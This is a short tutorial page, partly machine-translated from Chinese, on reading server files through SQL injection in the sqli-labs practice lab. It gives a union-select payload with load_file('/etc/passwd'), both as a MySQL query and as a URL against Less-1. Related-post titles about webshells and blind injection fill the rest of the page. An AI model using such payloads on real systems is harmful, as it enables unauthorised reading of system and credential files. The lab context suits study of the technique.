当前位置:网站首页>SQL injection read / write file
SQL injection read / write file
2022-06-12 06:25:00 【Cwillchris】
1、 SQL Inject read /etc/passwd file
stay MySQL Read files from , Use load_file(" File path / name ")
MariaDB [security]> select * from users where id=-1 union select 1,load_file("/etc/passwd"),3\G;

Access to the Less-1 page :
http://192.168.98.66/sqli-labs/Less-1/?id=-1' union select 1,load_file("/etc/passwd"),3--+

Use union The joint query , Execute in exportable position load_file Function to read the file
边栏推荐
- On the normalization of camera rotation interpolation
- 单通道图片的读入
- 相机图像质量概述
- SQL 注入-盲注
- cv2.fillPoly coco annotator segment坐标转化为mask图像
- leetcode 704. Binary search
- SQL 注入读写文件
- MNIST handwritten data recognition by RNN
- Excel VBA opens a file that begins with the specified character
- Highlight detection with pairwise deep ranking for first person video summary (thesis translation)
猜你喜欢

What states do threads have?

Pytorch implementation of regression model

线程有哪些状态?

Unity implements smooth interpolation

Codeforces Round #793 (Div. 2) A B C

Information content security experiment of Harbin Institute of Technology

Touch screen setting for win7 system dual screen extended display

Leetcode January 10 daily question 306 Additive number

QT--实现TCP通信

Trunet: short videos generation from long videos via story preserving truncation (thesis translation)
随机推荐
QT--实现TCP通信
SQL注入——联合查询union
Chartextcnn (Ag dataset - news topic classification)
PHP一句话木马深度详细剖析
GET 和 POST 的区别及留言板代码实现
AI作业ch8
夜神模擬器adb查看log
Multithreading (2) -- pipeline (4) -- Park and unpark
torch在高版本训练的模型在低版本中使用报错
Multithreading (4) -- no lock (2) -- Atomic related atomic classes
cv2.fillPoly coco annotator segment坐标转化为mask图像
Redis problem (I) -- cache penetration, breakdown, avalanche
Leetcode personal question solution (Sword finger offer3-5) 3 Duplicate number in array, 4 Find in 2D array, 5 Replace spaces
Unity3d script captures a sub area from the screen and saves it as texture2d, which is used to save pictures and maps
Open the camera in unity3d and display the contents of the camera in the scene as texture2d
LeetCode-剑指Offer(第二版)个人题解完整版
LeetCode-2034. Stock price fluctuation
线程有哪些状态?
Qt-- realize TCP communication
MNIST handwritten data recognition by RNN